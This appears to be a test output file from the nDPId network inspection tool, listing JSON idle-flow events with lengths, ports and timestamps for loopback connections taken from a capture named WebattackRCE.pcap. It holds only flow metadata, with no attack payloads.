-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 